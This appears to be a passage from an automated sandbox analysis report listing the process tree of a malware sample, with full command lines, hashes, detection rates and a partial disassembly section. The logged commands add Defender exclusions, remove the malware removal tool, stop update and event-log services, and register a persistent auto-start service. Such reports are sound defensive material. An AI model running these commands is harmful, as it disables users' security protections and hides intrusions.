                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 74%, ReversingLabs
                        Has exited:true

                        General

                        Target ID:23
                        Start time:10:05:18
                        Start date:07/01/2025
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:24
                        Start time:10:05:18
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:25
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Imagebase:0x7ff6ccb00000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:26
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Imagebase:0x7ff6ccb00000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:27
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:28
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:29
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:30
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:31
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:32
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:33
                        Start time:10:05:22
                        Start date:07/01/2025
                        Path:C:\Windows\System32\wusa.exe
                        Wow64 process (32bit):false
                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                        Imagebase:0x7ff67e9a0000
                        File size:345'088 bytes
                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:34
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\wusa.exe
                        Wow64 process (32bit):false
                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                        Imagebase:0x7ff67e9a0000
                        File size:345'088 bytes
                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:35
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:36
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:37
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:38
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:39
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:40
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:41
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:42
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:43
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop bits
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:44
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:45
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop bits
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:46
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:47
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:48
                        Start time:10:05:23
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:49
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:50
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:51
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\dialer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\dialer.exe
                        Imagebase:0x7ff74a3c0000
                        File size:39'936 bytes
                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:52
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\dialer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\dialer.exe
                        Imagebase:0x7ff74a3c0000
                        File size:39'936 bytes
                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:53
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe delete "ARIBLEUL"
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:54
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Imagebase:0x7ff6ccb00000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:55
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:56
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe delete "ARIBLEUL"
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:57
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:58
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:59
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:60
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:61
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\wusa.exe
                        Wow64 process (32bit):false
                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                        Imagebase:0x7ff67e9a0000
                        File size:345'088 bytes
                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:62
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:63
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe create "ARIBLEUL" binpath= "C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe" start= "auto"
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:64
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:65
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:66
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\winlogon.exe
                        Wow64 process (32bit):false
                        Commandline:winlogon.exe
                        Imagebase:0x7ff6156c0000
                        File size:906'240 bytes
                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        General

                        Target ID:67
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:68
                        Start time:10:05:24
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:70
                        Start time:10:05:25
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:71
                        Start time:10:05:25
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:72
                        Start time:10:05:25
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:73
                        Start time:10:05:25
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe start "ARIBLEUL"
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:74
                        Start time:10:05:25
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:75
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:76
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe
                        Wow64 process (32bit):false
                        Commandline:C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe
                        Imagebase:0x7ff7f7900000
                        File size:5'468'672 bytes
                        MD5 hash:87C3DD67BFA3009D89F7B45B01D705B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 68%, ReversingLabs
                        Has exited:true

                        General

                        Target ID:77
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop bits
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:78
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:79
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:80
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\sc.exe start "ARIBLEUL"
                        Imagebase:0x7ff70f100000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:81
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:82
                        Start time:10:05:26
                        Start date:07/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:81.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:7.1%
                          Total number of Nodes:28
                          Total number of Limit Nodes:1

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_00401000 1 Function_00401493 2 Function_00401448 1->2 4 Function_0040108C 1->4 5 Function_004013EC 1->5 3 Function_00401509 3->1 4->0

                          Executed Functions

                          Function 00401509 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2061631634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2061566778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2061670373.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2061670373.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2061670373.0000000001802000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2105218477.00000000018E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2105218477.0000000001929000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Solara.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                          • String ID:
                          • API String ID: 3649950142-0
                          • Opcode ID: 45a2b2b421cdc0cb52dca9eaf9b06ab1bf22c399180503235e2a5d3c71e4213b
                          • Instruction ID: d9a57b5445f16cddcc865972a350975d8c1f82a2d3fe4cd121f5dbfe1fab5339
                          • Opcode Fuzzy Hash: 45a2b2b421cdc0cb52dca9eaf9b06ab1bf22c399180503235e2a5d3c71e4213b
                          • Instruction Fuzzy Hash: 541121F9E01104ABCB10EBA8EC86F5A77ECAB09308F144475F804EB355E579EA448B65
                          Function 0040108C Relevance: 33.5, APIs: 11, Strings: 8, Instructions: 253filestringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2061631634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2061566778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2061670373.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2061670373.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
